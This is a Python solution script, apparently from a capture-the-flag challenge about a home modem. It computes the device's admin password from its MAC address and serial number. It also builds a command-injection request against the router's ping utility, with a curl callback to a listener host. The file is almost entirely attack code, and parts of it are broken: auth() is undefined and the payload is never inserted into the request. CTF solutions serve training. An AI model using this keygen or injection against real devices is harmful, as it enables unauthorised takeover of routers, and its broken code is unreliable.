cyberchallenge-modem/solution/solution.py

42 lines
1005 B
Python
Raw Normal View History

import requests
import hashlib
import sys
def xorshift(x, y, z, w):
t = x
t = t ^ ((t << 11) & 0xFFFFFFFF)
t = t ^ (t >> 8)
x, y, z = y, z, w
w = (w ^ (w >> 19)) ^ t
return x, y, z, w, t
def keygen(mac, serial):
l = 20
password = ""
md5a = hashlib.md5(mac).hexdigest()
md5b = hashlib.md5(serial).hexdigest()
w = int(md5a[0:8], 16)
x = int(md5a[8:16], 16)
y = int(md5a[16:24], 16)
z = int(md5a[24:32], 16)
for i in range(0, l):
x, y, z, w, t = xorshift(x, y, z, w)
password += md5b[t % 20]
return password
def rce(username, password, host, payload):
requests.post("http://{}/utils.php".format(host), auth=auth(username, password), data={"action": "ping", "host": "127.0.0.1\n".format(payload.replace(' ', '${IFS}'))})
def main():
serial = sys.argv[1].encode("ascii")
mac = sys.argv[2].encode("ascii")
host = "192.168.77.1"
payload = "curl 192.168.77.10:8080"
password = keygen(mac, serial)
print(password)
#rce("admin", password, host, payload)
main()